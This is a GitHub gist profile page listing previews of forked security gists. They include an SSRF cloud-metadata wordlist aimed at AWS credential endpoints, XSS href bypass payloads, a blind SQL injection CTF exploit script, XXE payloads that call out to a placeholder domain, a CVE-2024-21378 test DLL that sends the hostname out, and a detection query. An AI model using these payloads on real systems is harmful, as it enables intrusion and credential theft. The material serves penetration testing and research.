Skip to content

Instantly share code, notes, and snippets.

View 0xSojalSec's full-sized avatar
🤒
Out sick

GH0ST_3exP10it 0xSojalSec

🤒
Out sick
337 followers · 2.1k following
View GitHub Profile
@0xSojalSec
0xSojalSec / intermediate.cnf
Created June 12, 2025 21:04 — forked from 0xilis/intermediate.cnf
self-signed-shortcut-tutorial
[ req ]
distinguished_name = req_distinguished_name
x509_extensions = v3_intermediate_ca
prompt = no
[ req_distinguished_name ]
C = US
ST = Snooltopia
L = Snoolcity
O = Snoolie Inc
@0xSojalSec
0xSojalSec / cloud_metadata.txt
Created April 24, 2025 20:06 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@0xSojalSec
0xSojalSec / href_bypass.html
Created March 8, 2025 17:34 — forked from hackerscrolls/href_bypass.html
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
@0xSojalSec
0xSojalSec / exploit.js
Created January 12, 2025 18:10 — forked from terjanq/exploit.js
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'
// Generates definitions for fonts
function generateFonts() {
@0xSojalSec
0xSojalSec / README.md
Created October 27, 2024 19:26 — forked from TheBinitGhimire/README.md
Dangling DNS Records leading to Sub-domain Takeover on api.techprep.fb.com!

Dangling DNS Records on api.techprep.fb.com - $500!

Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk

I have included my script in another file (main.sh), which I used in discovering this vulnerability.

I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.

I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.

@0xSojalSec
0xSojalSec / xxe-payloads.txt
Created October 4, 2024 20:00 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@0xSojalSec
0xSojalSec / test_dll.c
Created April 12, 2024 19:38 — forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
@0xSojalSec
0xSojalSec / 1_top+hacker_methodologies.md
Created January 6, 2024 18:31 — forked from ruevaughn/1_top+hacker_methodologies.md
Hacker Methodologies & Tools (NEW)

The Top Hacker Methodologies & Tools Notes

By Chase. ** *

Nuclei Templates

Concrete5 CMS : Identification, Mass Hunting, Nuclei Template Writing & Reporting

@0xSojalSec
0xSojalSec / index.md
Created December 7, 2023 17:44 — forked from paj28/index.md

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

@0xSojalSec
0xSojalSec / ES|QL Masquerading as MS Native DLL
Created November 9, 2023 19:22 — forked from Samirbous/ES|QL Masquerading as MS Native DLL
// DLLs normally located in system32 but unsigned and loaded from elsewhere
// https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html
// example ENRICH libs-policy creation steps
https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c
ES|QL query:
from .ds-logs-endpoint.events.library-*
| where event.action == "load" and process.code_signature.status == "trusted" and dll.code_signature.status != "trusted" and